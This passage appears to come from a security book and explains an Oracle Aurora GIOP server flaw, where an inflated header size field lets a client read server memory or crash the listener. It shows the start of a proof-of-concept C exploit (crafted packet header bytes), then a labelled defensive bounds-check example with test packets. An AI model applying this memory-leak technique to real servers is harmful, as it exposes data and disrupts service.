3.2. The Aurora GIOP Server

By default, Oracle 9.0.1 and Oracle 8.1.7.4 both install an IIOP (Internet Inter-Orb Protocol) server to enable access to CORBA applications. IIOP is an implementation of GIOP, the General Inter-Orb Protocol. A vulnerability in this server can allow attackers to either dump arbitrary memory from the server over the network or crash the server. This flaw has been reported to Oracle and a patch will be forthcoming. GIOP packets have a size element in their header that indicates how much data the client is sending. The server uses this size parameter to build its response. If the client sends a size larger than the amount of data it actually sends, the server will just happily read whatever is in memory up to the size specified by the attacker. This way an attacker can begin to poke about in the memory of the TNS Listener. If the size is large enough, the Listener eventually attempts to read uninitialized memory and access violates, thus denying service. The following code demonstrates this:

#include <stdio.h>
#include <windows.h>
#include <winsock.h>

int SendGIOPPacket(void);
int StartWinsock(void);
int packet_length(char *);
int PrintResponse(unsigned char *p, int l);
int bswap_i(unsigned int);


struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
int IIOPPort=2481;
char host[260]="";
int PKT_LEN = 148;
unsigned char GIOPPacketHeader[2000]=
"\x47\x49\x4f\x50" // MAGIC
"\x01\x00" // VERSION
"\x00" // BYTE ORDER
"\x00" // ...
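As an added example (not code from the book), here is the server-side check that would have prevented this bug: parse the 12-byte GIOP 1.0 header and refuse to honour a message_size larger than the number of bytes actually received. The sample packets are constructed for illustration, and the enum and function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A GIOP 1.0 message header is 12 bytes: magic "GIOP", version (major,
   minor), byte-order flag, message type, then a 4-byte message_size. */
#define GIOP_HDR_LEN 12

enum giop_check {
    GIOP_OK = 0,
    GIOP_TOO_SHORT,     /* fewer than 12 bytes received, no header to parse */
    GIOP_BAD_MAGIC,     /* first four bytes are not "GIOP" */
    GIOP_SIZE_MISMATCH  /* header claims more body than the peer sent */
};

/* Decode message_size honouring the byte-order flag at offset 6
   (GIOP 1.0: 0 = big-endian, 1 = little-endian). */
static uint32_t giop_message_size(const unsigned char *h)
{
    if (h[6] & 0x01)
        return (uint32_t)h[8] | ((uint32_t)h[9] << 8) |
               ((uint32_t)h[10] << 16) | ((uint32_t)h[11] << 24);
    return ((uint32_t)h[8] << 24) | ((uint32_t)h[9] << 16) |
           ((uint32_t)h[10] << 8) | (uint32_t)h[11];
}

/* The bounds check the text says the listener omits: message_size is
   only trusted if that many body bytes were actually received. */
enum giop_check giop_validate(const unsigned char *buf, size_t received_len)
{
    if (received_len < GIOP_HDR_LEN) return GIOP_TOO_SHORT;
    if (memcmp(buf, "GIOP", 4) != 0) return GIOP_BAD_MAGIC;
    if (giop_message_size(buf) > received_len - GIOP_HDR_LEN)
        return GIOP_SIZE_MISMATCH;
    return GIOP_OK;
}

/* Constructed sample packets (not captures): a header claiming a 4-byte
   body with 4 bytes present, and the same header claiming 0x1000 bytes. */
const unsigned char kHonestPacket[] = {
    'G','I','O','P', 1,0, 0, 0, 0,0,0,4, 0xAA,0xBB,0xCC,0xDD };
const unsigned char kOverstatedPacket[] = {
    'G','I','O','P', 1,0, 0, 0, 0,0,0x10,0, 0xAA,0xBB,0xCC,0xDD };
/* Little-endian flag set: size 4 is encoded as 04 00 00 00. */
const unsigned char kLittleEndianPacket[] = {
    'G','I','O','P', 1,0, 1, 0, 4,0,0,0, 0xAA,0xBB,0xCC,0xDD };
```

A listener that returns GIOP_SIZE_MISMATCH here never builds a response from the oversized length, so neither the memory read nor the access violation described above can be triggered through this field.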
